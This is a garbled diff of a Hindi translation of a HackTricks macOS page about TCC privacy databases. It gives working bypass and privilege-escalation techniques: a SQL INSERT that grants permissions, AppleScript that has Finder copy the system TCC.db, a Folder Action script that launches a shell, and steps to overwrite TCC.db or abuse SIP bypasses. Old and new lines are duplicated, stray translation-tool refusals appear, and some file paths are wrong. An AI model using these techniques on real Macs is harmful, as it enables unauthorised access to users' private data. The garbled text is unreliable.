* यह डेटाबेस संरक्षित है इसलिए केवल उच्च TCC विशेषाधिकार वाली प्रक्रियाएँ जैसे कि Full Disk Access ही इसमें लिख सकती हैं (लेकिन यह SIP द्वारा संरक्षित नहीं है)।
{% hint style="warning" %}
पिछले डेटाबेस भी **पढ़ने के लिए TCC संरक्षित हैं**। इसलिए आप अपने सामान्य उपयोगकर्ता TCC डेटाबेस को नहीं पढ़ पाएंगे जब तक कि यह एक TCC विशेषाधिकार वाली प्रक्रिया से न हो।
पिछले डेटाबेस भी **पढ़ने के लिए TCC संरक्षित** हैं। इसलिए आप अपने सामान्य उपयोगकर्ता TCC डेटाबेस को तब तक **नहीं पढ़ पाएंगे** जब तक यह एक TCC विशेषाधिकार वाली प्रक्रिया से न हो।
हालांकि, याद रखें कि इन उच्च विशेषाधिकारों वाली प्रक्रिया (जैसे कि **FDA** या **`kTCCServiceEndpointSecurityClient`**) उपयोगकर्ता के TCC डेटाबेस में लिख सकती है।
{% endhint %}
* **`/var/db/locationd/clients.plist`** में एक **तीसरा** TCC डेटाबेस है जो **स्थान सेवाओं के उपयोग की अनुमति वाले ग्राहकों** को दर्शाता है।
* **स्थान सेवाओं** के लिए अनुमति देने वाले ग्राहकों को दर्शाने के लिए **तीसरा** TCC डेटाबेस **`/var/db/locationd/clients.plist`** में है।
* SIP संरक्षित फ़ाइल **`/Users/carlospolop/Downloads/REG.db`** (TCC के साथ पढ़ने के लिए भी संरक्षित), सभी **वैध TCC डेटाबेसों** के **स्थान** को समाहित करती है।
* SIP संरक्षित फ़ाइल **`/Users/carlospolop/Downloads/MDMOverrides.plist`** (TCC के साथ पढ़ने के लिए भी संरक्षित), अधिक TCC अनुमतियों को समाहित करती है
* SIP संरक्षित फ़ाइल **`/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist`** (लेकिन किसी भी व्यक्ति द्वारा पढ़ी जा सकती है) एक अनुमति सूची है जो एप्लिकेशनों को TCC अपवाद की आवश्यकता होती है।&#x20;
* SIP संरक्षित फ़ाइल **`/Users/carlospolop/Downloads/MDMOverrides.plist`** (TCC के साथ पढ़ने के लिए भी संरक्षित), अधिक TCC अनुमतियाँ दी गई हैं
* SIP संरक्षित फ़ाइल **`/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist`** (लेकिन किसी भी व्यक्ति द्वारा पढ़ी जा सकती है) एक अनुमति सूची है जिसमें उन एप्लिकेशनों का उल्लेख है जिन्हें TCC अपवाद की आवश्यकता है।
{% hint style="success" %}
**iOS** में TCC डेटाबेस **`/private/var/mobile/Library/TCC/TCC.db`** में है।
@ -78,7 +78,7 @@ com.apple.rootless.storage.TCC
#### डेटाबेस की पूछताछ करें
{% tabs %}
{% tab title="user DB" %}
{% tab title="उपयोगकर्ता DB" %}
{% code overflow="wrap" %}
```bash
sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db
@ -96,7 +96,7 @@ sqlite> select * from access where client LIKE "%telegram%" and auth_value=2;
# Check user denied permissions for telegram
sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;
```
Since the content to be translated is not provided, I'm unable to proceed with the translation. Please provide the English text that you would like to have translated into Hindi.
Since the content to be translated has not been provided, I'm unable to proceed with the translation. Please provide the English text that needs to be translated into Hindi, and I will translate it while maintaining the markdown and HTML syntax as requested.
```bash
sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db
sqlite> .schema
@ -173,9 +173,7 @@ sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;
* **`auth_value`** विभिन्न मान ले सकता है: denied(0), unknown(1), allowed(2), या limited(3).
* **`auth_reason`** निम्नलिखित मान ले सकता है: Error(1), User Consent(2), User Set(3), System Set(4), Service Policy(5), MDM Policy(6), Override Policy(7), Missing usage string(8), Prompt Timeout(9), Preflight Unknown(10), Entitled(11), App Type Policy(12)
* **csreq** क्षेत्र यह इंगित करने के लिए है कि कैसे बाइनरी को सत्यापित करने और TCC अनुमतियाँ प्रदान करने के लिए:
</details>
* **csreq** क्षेत्र यह इंगित करने के लिए है कि बाइनरी को कैसे सत्यापित करें और TCC अनुमतियाँ प्रदान करें:
```bash
# Query to get cserq in printable hex
select service, client, hex(csreq) from access where auth_value=2;
@ -193,10 +191,10 @@ echo "X'$REQ_HEX'"
```
* अधिक जानकारी के लिए तालिका के **अन्य फील्ड्स** के बारे में [**इस ब्लॉग पोस्ट को देखें**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive).
आप `System Preferences --> Security & Privacy --> Privacy --> Files and Folders` में **पहले से दी गई अनुमतियों** को भी देख सकते हैं।
आप `System Preferences --> Security & Privacy --> Privacy --> Files and Folders` में ऐप्स को **पहले से दिए गए अनुमतियां** भी देख सकते हैं।
{% hint style="success" %}
उपयोगकर्ता **`tccutil`** का उपयोग करके **नियमों को हटा सकते हैं या जांच सकते हैं**।
उपयोगकर्ता **`tccutil`** का उपयोग करके नियमों को **हटा सकते हैं या जांच सकते हैं**।
{% endhint %}
#### TCC अनुमतियों को रीसेट करें
@ -209,7 +207,7 @@ tccutil reset All
```
### TCC हस्ताक्षर जांच
TCC **डेटाबेस** एप्लिकेशन के **Bundle ID** को संग्रहीत करता है, परंतु यह **जानकारी** भी **संग्रहीत** करता है कि **हस्ताक्षर** के बारे में **सुनिश्चित** करने के लिए कि अनुमति का उपयोग करने के लिए पूछने वाला ऐप सही है।
TCC **डेटाबेस** एप्लिकेशन के **Bundle ID** को संग्रहीत करता है, परंतु यह **जानकारी** भी संग्रहीत करता है कि **हस्ताक्षर** के बारे में **सुनिश्चित** करने के लिए कि अनुमति का उपयोग करने के लिए पूछने वाला ऐप सही है।
{% code overflow="wrap" %}
```bash
@ -226,17 +224,17 @@ csreq -t -r /tmp/telegram_csreq.bin
{% endcode %}
{% hint style="warning" %}
इसलिए, एक ही नाम और बंडल ID वाले अन्य एप्लिकेशन्स दूसरे एप्स को दिए गए अनुमतियों तक पहुँचने में सक्षम नहीं होंगे।
इसलिए, एक ही नाम और बंडल ID का उपयोग करने वाले अन्य एप्लिकेशन अन्य एप्स को दिए गए अनुमतियों तक पहुँचने में सक्षम नहीं होंगे।
{% endhint %}
### Entitlements & TCC Permissions
### Entitlements & TCC अनुमतियाँ
एप्लिकेशन्स को **केवल अनुरोध करने की जरूरत नहीं होती** और कुछ संसाधनों तक पहुँचने के लिए **अनुमति प्राप्त की जाती है**, उन्हें **संबंधित entitlements भी होनी चाहिए**।\
एप्लिकेशन **केवल अनुरोध करने की जरूरत नहीं होती** और कुछ संसाधनों तक पहुँचने के लिए **अनुमति प्राप्त की गई हो**, उन्हें **संबंधित entitlements भी होनी चाहिए**।\
उदाहरण के लिए **Telegram** के पास कैमरा तक पहुँच के लिए अनुरोध करने के लिए entitlement `com.apple.security.device.camera` है। एक **एप्लिकेशन** जिसके पास यह **entitlement नहीं है** वह कैमरा तक पहुँचने में सक्षम **नहीं होगा** (और उपयोगकर्ता से अनुमतियों के लिए भी नहीं पूछा जाएगा)।
हालांकि, एप्लिकेशन्स को `~/Desktop`, `~/Downloads` और `~/Documents` जैसे **कुछ उपयोगकर्ता फोल्डर्स** तक **पहुँचने के लिए** किसी विशेष **entitlements की जरूरत नहीं होती है।** सिस्टम स्वचालित रूप से पहुँच को संभालेगा और जरूरत पड़ने प**उपयोगकर्ता को संकेत देगा**
हालांकि, एप्लिकेशन को `~/Desktop`, `~/Downloads` और `~/Documents` जैसे **कुछ उपयोगकर्ता फोल्डरों** तक **पहुँचने** के लिए किसी विशेष **entitlements की जरूरत नहीं होती है।** सिस्टम पारदर्शी रूप से पहुँच को संभालेगा और जरूरत के अनुसा**उपयोगकर्ता को संकेत देगा**
Apple के एप्लिकेशन्स **संकेत उत्पन्न नहीं करेंगे**। उनमें उनकी **entitlements सूची में पूर्व-अनुमत अधिकार** होते हैं, जिसका अर्थ है कि वे **कभी भी पॉपअप उत्पन्न नहीं करेंगे**, **न ही** वे किसी भी **TCC डेटाबेस में दिखाई देंगे।** उदाहरण के लिए:
Apple के एप्लिकेशन **संकेत उत्पन्न नहीं करेंगे**। उनमें उनकी **entitlements सूची** में **पूर्व-अनुमत अधिकार** होते हैं, जिसका अर्थ है कि वे **कभी भी पॉपअप उत्पन्न नहीं करेंगे**, **न ही** वे किसी भी **TCC डेटाबेस** में दिखाई देंगे। उदाहरण के लिए:
```bash
codesign -dv --entitlements :- /System/Applications/Calendar.app
[...]
@ -247,13 +245,13 @@ codesign -dv --entitlements :- /System/Applications/Calendar.app
<string>kTCCServiceAddressBook</string>
</array>
```
इससे कैलेंडर को यूजर से रिमाइंडर्स, कैलेंडर और एड्रेस बुक तक पहुंचने के लिए पूछने से बचा जा सकेगा।
इससे कैलेंडर उपयोगकर्ता से रिमाइंडर्स, कैलेंडर और पता पुस्तिका तक पहुँचने के लिए नहीं पूछेगा।
{% hint style="success" %}
कुछ आधिकारिक दस्तावेजों के अलावा, एंटाइटलमेंट्स के बारे में **अनौपचारिक रोचक जानकारी** भी [**https://newosxbook.com/ent.jl**](https://newosxbook.com/ent.jl) पर मिल सकती है।
कुछ आधिकारिक दस्तावेज़ीकरण के अलावा, अधिकारों के बारे में अनौपचारिक **रोचक जानकारी** भी [**https://newosxbook.com/ent.jl**](https://newosxbook.com/ent.jl) पर मिल सकती है।
{% endhint %}
कुछ TCC अनुमतियां हैं: kTCCServiceAppleEvents, kTCCServiceCalendar, kTCCServicePhotos... इन सभी की एक सार्वजनिक सूची नहीं है लेकिन आप इस [**ज्ञात सूची**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive#service) को देख सकते हैं।
कुछ TCC अनुमतियाँ हैं: kTCCServiceAppleEvents, kTCCServiceCalendar, kTCCServicePhotos... उन सभी की कोई सार्वजनिक सूची नहीं है लेकिन आप इस [**ज्ञात सूची**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive#service) को देख सकते हैं।
### संवेदनशील असुरक्षित स्थान
@ -261,9 +259,9 @@ codesign -dv --entitlements :- /System/Applications/Calendar.app
* $HOME/.ssh, $HOME/.aws, आदि
* /tmp
### यूजर इरादा / com.apple.macl
### उपयोगकर्ता इरादा / com.apple.macl
पहले उल्लेखित अनुसार, यह संभव है कि **एक फाइल को उसे ड्रैग एंड ड्रॉप करके एक ऐप को एक्सेस दिया जा सकता है**। यह एक्सेस किसी भी TCC डेटाबेस में निर्दिष्ट नहीं होगा लेकिन एक **विस्तारित** **फाइल के गुण के रूप में**। यह गुण **अनुमति प्राप्त ऐप का UUID सटोर करेगा**।
पहले उल्लेख किया गया है, यह संभव है कि **एक ऐप को फाइल तक पहुँच देने के लिए उसे ड्रैग एंड ड्रॉप करके उसमें डाला जा सकता है**। यह पहुँच TCC डेटाबेस में कहीं निर्दिष्ट नहीं होगी लेकिन फाइल के **विस्तारित गुण** के रूप में होगी। यह गुण **अनुमति प्राप्त ऐप का UUID संग्रहित करेगा**।
```bash
xattr Desktop/private.txt
com.apple.macl
@ -281,20 +279,20 @@ uuid 769FD8F1-90E0-3206-808C-A8947BEBD6C3
{% hint style="info" %}
यह जिज्ञासा की बात है कि **`com.apple.macl`** विशेषता का प्रबंधन **Sandbox** द्वारा किया जाता है, tccd द्वारा नहीं।
यह भी ध्यान दें कि यदि आप एक फाइल को जो आपके कंप्यूटर में एक ऐप के UUID की अनुमति देती है, एक अलग कंप्यूटर में स्थानांतरित करते हैं, क्योंकि वही ऐप विभिन्न UIDs के साथ होगा, वह उस ऐप को उस फाइल तक पहुँच प्रदान नहीं करेगा।
यह भी ध्यान दें कि यदि आप एक फाइल को जो आपके कंप्यूटर में एक ऐप के UUID की अनुमति देती है, एक अलग कंप्यूटर पर ले जाते हैं, क्योंकि वही ऐप अलग UIDs के साथ होगा, यह उस ऐप को उस तक पहुँच की अनुमति नहीं देगा।
{% endhint %}
विस्तारित विशेषता `com.apple.macl` **साफ़ नहीं की जा सकती** क्योंकि यह **SIP द्वारा सुरक्षित है**। हालांकि, [**इस पोस्ट में बताया गया है**](https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/), इसे अक्षम करना संभव है फाइल को **ज़िप करके**, **हटाकर** और **अनज़िप करके**
विस्तारित विशेषता `com.apple.macl` को अन्य विस्तारित विशेषताओं की तरह **साफ नहीं किया जा सकता** क्योंकि यह **SIP द्वारा सुरक्षित है**। हालांकि, [**इस पोस्ट में बताया गया है**](https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/) कि फाइल को **zipping** करके, **deleting** करके और **unzipping** करके इसे अक्षम करना संभव है
## TCC Privesc & Bypasses
### TCC में प्रविष्टि करें
### TCC में प्रविष्टि
यदि किसी बिंदु पर आप TCC डेटाबेस पर लिखने की पहुँच प्राप्त कर लेते हैं, तो आप निम्नलिखित का उपयोग करके एक प्रविष्टि जोड़ सकते हैं (टिप्पणियों को हटा दें):
<details>
<summary>TCC में प्रविष्टि करने का उदाहरण</summary>
<summary>TCC में प्रविष्टि का उदाहरण</summary>
```sql
INSERT INTO access (
service,
@ -336,12 +334,12 @@ strftime('%s', 'now') -- last_reminded with default current timestamp
```
</details>
### स्वचालन से FDA\*
### ऑटोमेशन (फाइंडर) से FDA\*
TCC का स्वचालन अनुमति नाम है: **`kTCCServiceAppleEvents`**\
यह विशिष्ट TCC अनुमति यह भी दर्शाती है कि **कौन सा एप्लिकेशन प्रबंधित किया जा सकता है** TCC डेटाबेस के अंदर (इसलिए अनुमतियाँ सिर्फ सब कुछ प्रबंधित करने की अनुमति नहीं देती हैं)।
TCC की ऑटोमेशन अनुमति का नाम है: **`kTCCServiceAppleEvents`**\
यह विशेष TCC अनुमति यह भी इंगित करती है कि **कौन सा एप्लिकेशन TCC डेटाबेस के अंदर प्रबंधित किया जा सकता है** (इसलिए अनुमतियाँ सिर्फ सब कुछ प्रबंधित करने की अनुमति नहीं देती हैं)।
**Finder** एक ऐसा एप्लिकेशन है जिसके पास **हमेशा FDA होता है** (भले ही यह UI में न दिखाई दे), इसलिए यदि आपके पास इस पर **स्वचालन** विशेषाधिकार हैं, तो आप इसके विशेषाधिकारों का दुरुपयोग करके **कुछ क्रियाए करवा सकते हैं**।\
**फाइंडर** एक ऐसा एप्लिकेशन है जिसके पास **हमेशा FDA होता है** (भले ही यह UI में न दिखाई दे), इसलिए यदि आपके पास इस पर **ऑटोमेशन** विशेषाधिकार हैं, तो आप इसके विशेषाधिकारों का दुरुपयोग करके **कुछ क्रियाए करवा सकते हैं**।\
इस मामले में आपके एप्लिकेशन को **`com.apple.Finder`** पर **`kTCCServiceAppleEvents`** की अनुमति की आवश्यकता होगी।
{% tabs %}
@ -364,7 +362,7 @@ EOD
```
{% endtab %}
{% tab title="Steal systems TCC.db" %}
{% tab title="सिस्टम्स TCC.db चुराएं" %}
```applescript
osascript<<EOD
tell application "Finder"
@ -385,12 +383,12 @@ EOD
आप इसका दुरुपयोग करके **अपना स्वयं का उपयोगकर्ता TCC डेटाबेस लिख सकते हैं**
{% hint style="warning" %}
इस अनुमति के साथ आप **finder से TCC प्रतिबंधित फ़ोल्डरों तक पहुँचने के लिए कह सकते हैं** और आपको फ़ाइलें दे सकते हैं, लेकिन जहाँ तक मुझे पता है आप **Finder को मनमाना कोड निष्पादित करने के लिए नहीं बना पाएंगे** ताकि उसके FDA एक्सेस का पूर्ण दुरुपयोग कर सकें।
इस अनुमति के साथ आप **finder से TCC प्रतिबंधित फ़ोल्डरों तक पहुँचने के लिए कह सकते हैं** और आपको फ़ाइलें दे सकते हैं, लेकिन जहाँ तक मुझे पता है आप **Finder को मनमाना कोड निष्पादित करने के लिए नहीं बना पाएंगे** ताकि उसके FDA एक्सेस का पूर दुरुपयोग कर सकें।
इसलिए, आप FDA क्षमताओं का पूर्ण दुरुपयोग नहीं कर पाएंगे।
इसलिए, आप FDA क्षमताओं का पूर दुरुपयोग नहीं कर पाएंगे।
{% endhint %}
यह TCC प्रॉम्प्ट Finder पर Automation विशेषाधिकार प्राप्त करने के लिए है:
यह TCC प्रॉम्प्ट है जिससे Finder पर Automation विशेषाधिकार प्राप्त करने के लिए:
<figure><img src="../../../../.gitbook/assets/image (1).png" alt="" width="244"><figcaption></figcaption></figure>
@ -400,7 +398,7 @@ EOD
<details>
<summary>Automator के अंदर एक shell प्राप्त करें</summary>
<summary>Automator के अंदर एक शेल प्राप्त करें</summary>
```applescript
osascript<<EOD
set theScript to "touch /tmp/something"
@ -424,12 +422,56 @@ EOD
वही **Script Editor app** के साथ होता है, यह Finder को नियंत्रित कर सकता है, लेकिन AppleScript का उपयोग करके आप इसे स्क्रिप्ट निष्पादित करने के लिए मजबूर नहीं कर सकते।
### Automation + Accessibility (**`kTCCServicePostEvent`**) से FDA\*
### Automation (SE) कुछ TCC के लिए
**`System Events`** पर Automation + Accessibility (**`kTCCServicePostEvent`**) **प्रक्रियाओं को कीस्ट्रोक्स भेजने** की अनुमति देता है। इस तरह आप Finder का दुरुपयोग करके उपयोगकर्ता के TCC.db को बदल सकते हैं या किसी मनमाने ऐप को FDA दे सकते हैं (हालांकि इसके लिए पासवर्ड की प्रॉम्प्ट हो सकती है)।
System Events Folder Actions बना सकते हैं, और Folder actions कुछ TCC फोल्डर्स तक पहुँच सकते हैं, इसलिए निम्नलिखित जैसी स्क्रिप्ट का उपयोग इस व्यवहार का दुरुपयोग करने के लिए किया जा सकता है:
</details>
```bash
# Create script to execute with the action
cat > "/tmp/script.js" <<EOD
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("/Applications/iTerm.app/Contents/MacOS/iTerm2");
EOD
osacompile -l JavaScript -o "$HOME/Library/Scripts/Folder Action Scripts/script.scpt" "/tmp/script.js"
# Create folder action with System Events in "$HOME/Desktop"
osascript <<EOD
tell application "System Events"
-- Ensure Folder Actions are enabled
set folder actions enabled to true
-- Define the path to the folder and the script
set homeFolder to path to home folder as text
set folderPath to homeFolder & "Desktop"
set scriptPath to homeFolder & "Library:Scripts:Folder Action Scripts:script.scpt"
-- Create or get the Folder Action for the Desktop
if not (exists folder action folderPath) then
make new folder action at end of folder actions with properties {name:folderPath, path:folderPath}
end if
set myFolderAction to folder action folderPath
-- Attach the script to the Folder Action
if not (exists script scriptPath of myFolderAction) then
make new script at end of scripts of myFolderAction with properties {name:scriptPath, path:scriptPath}
end if
-- Enable the Folder Action and the script
enable myFolderAction
end tell
EOD
# Open the folder, this won't be enough, but just getting out of it, or getting it is enough to trigger the folder action script
open "$HOME/Desktop"
```
### स्वचालन (SE) + पहुँच क्षमता (**`kTCCServicePostEvent`)** FDA\* के लिए
**`System Events`** पर स्वचालन + पहुँच क्षमता (**`kTCCServicePostEvent`**) **प्रक्रियाओं को कीस्ट्रोक्स भेजने** की अनुमति देता है। इस तरह आप Finder का उपयोग करके उपयोगकर्ता के TCC.db को बदल सकते हैं या किसी मनमाने ऐप को FDA दे सकते हैं (हालांकि इसके लिए पासवर्ड की प्रॉम्प्ट हो सकती है)।
Finder द्वारा उपयोगकर्ता के TCC.db को ओवरराइट करने का उदाहरण:
</details>
```applescript
-- store the TCC.db file to copy in /tmp
osascript <<EOF
@ -477,7 +519,7 @@ EOF
```
### **Endpoint Security Client से FDA तक**
यदि आपके पास **`kTCCServiceEndpointSecurityClient`** है, तो आपके पास FDA है। समाप्त।
यदि आपके पास **`kTCCServiceEndpointSecurityClient`** है, तो आपके पास FDA है। अंत।
### System Policy SysAdmin File से FDA तक
@ -485,7 +527,7 @@ EOF
### User TCC DB से FDA तक
उपयोगकर्ता TCC डेटाबेस पर **लिखने की अनुमति** प्राप्त करके आप खुद को **`FDA`** अनुमतिया नहीं दे सकते, केवल वही जो सिस्टम डेटाबेस में रहता है वह यह अनुमति दे सकता है।
उपयोगकर्ता TCC डेटाबेस पर **लिखने की अनुमति** प्राप्त करके आप खुद को **`FDA`** अनुमतिया नहीं दे सकते, केवल वही जो सिस्टम डेटाबेस में रहता है वह यह अनुमति दे सकता है।
लेकिन आप खुद को **`Finder के लिए Automation अधिकार`** दे सकते हैं, और पिछली तकनीक का दुरुपयोग करके FDA तक बढ़ा सकते हैं\*।
@ -493,18 +535,18 @@ EOF
**Full Disk Access** का TCC नाम **`kTCCServiceSystemPolicyAllFiles`** है
मुझे नहीं लगता कि यह एक वास्तविक privesc है, लेकिन यदि आपको यह उपयोगी लगे: यदि आप FDA के साथ एक प्रोग्राम को नियंत्रित करते हैं तो आप **उपयोगकर्ता के TCC डेटाबेस को संशोधित कर सकते हैं और खुद को कोई भी एक्सेस दे सकते हैं**। यह एक पर्सिस्टेंस तकनीक के रूप में उपयोगी हो सकता है यदि आप अपनी FDA अनुमतिया खो सकते हैं।
मुझे नहीं लगता कि यह एक वास्तविक privesc है, लेकिन यदि आपको यह उपयोगी लगे: यदि आप FDA के साथ एक प्रोग्राम को नियंत्रित करते हैं तो आप **उपयोगकर्ता के TCC डेटाबेस को संशोधित कर सकते हैं और खुद को कोई भी एक्सेस दे सकते हैं**। यह एक पर्सिस्टेंस तकनीक के रूप में उपयोगी हो सकता है यदि आप अपनी FDA अनुमतिया खो सकते हैं।
### **SIP Bypass से TCC Bypass तक**
सिस्टम **TCC डेटाबेस** **SIP** द्वारा संरक्षित है, इसलिए केवल उन प्रक्रियाओं के साथ **इंडिकेटेड एंटाइटलमेंट्स** होने पर ही इसे संशोधित करने में सक्षम होंगे। इसलिए, यदि एक हमलावर को **SIP बायपास** मिलता है एक **फाइल** पर (SIP द्वारा प्रतिबंधित एक फाइल को संशोधित करने में सक्षम हो), वह सक्षम होगा:
सिस्टम **TCC डेटाबेस** **SIP** द्वारा संरक्षित है, इसलिए केवल उन प्रक्रियाओं के साथ जिनके पास **निर्दिष्ट entitlements हैं, वे इसे संशोधित करने में सक्षम होंगे**। इसलिए, यदि एक हमलावर को **SIP बायपास** मिलता है एक **फाइल** पर (SIP द्वारा प्रतिबंधित एक फाइल को संशोधित करने में सक्षम हो), वह सक्षम होगा:
* TCC डेटाबेस की सुरक्षा को **हटाने** के लिए, और खुद को सभी TCC अनुमतिया देने के लिए। वह इन फाइलों में से किसी का भी दुरुपयोग कर सकता है, उदाहरण के लिए:
* TCC डेटाबेस की सुरक्षा को **हटाने** के लिए, और खुद को सभी TCC अनुमतिया देने के लिए। वह इन फाइलों में से किसी का भी दुरुपयोग कर सकता है, उदाहरण के लिए:
* TCC सिस्टम्स डेटाबेस
* REG.db
* MDMOverrides.plist
हालांकि, TCC को बायपास करने के लिए इस **SIP बायपास** का दुरुपयोग करने का एक और विकल्प है, फाइल `/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist` एक अनुमति सूची है जिसमें ऐसे एप्लिकेशन हैं जिन्हें TCC अपवाद की आवश्यकता होती है। इसलिए, यदि एक हमलावर इस फाइल से **SIP सुरक्षा को हटा सकता है** और अपना **खुद का एप्लिकेशन** जोड़ सकता है तो एप्लिकेशन TCC को बायपास करने में सक्षम होगा।\
हालांकि, TCC को बायपास करने के लिए इस **SIP बायपास का दुरुपयोग करने का एक और विकल्प है**, फाइल `/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist` एक अनुमति सूची है जिसमें ऐसे एप्लिकेशन हैं जिन्हें TCC अपवाद की आवश्यकता है। इसलिए, यदि एक हमलावर इस फाइल से **SIP सुरक्षा को हटा सकता है** और अपना **खुद का एप्लिकेशन जोड़ सकता है** तो एप्लिकेशन TCC को बायपास करने में सक्षम होगा।\
उदाहरण के लिए टर्मिनल जोड़ने के लिए:
```bash
# Get needed info
@ -552,7 +594,7 @@ AllowApplicationsList.plist:
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**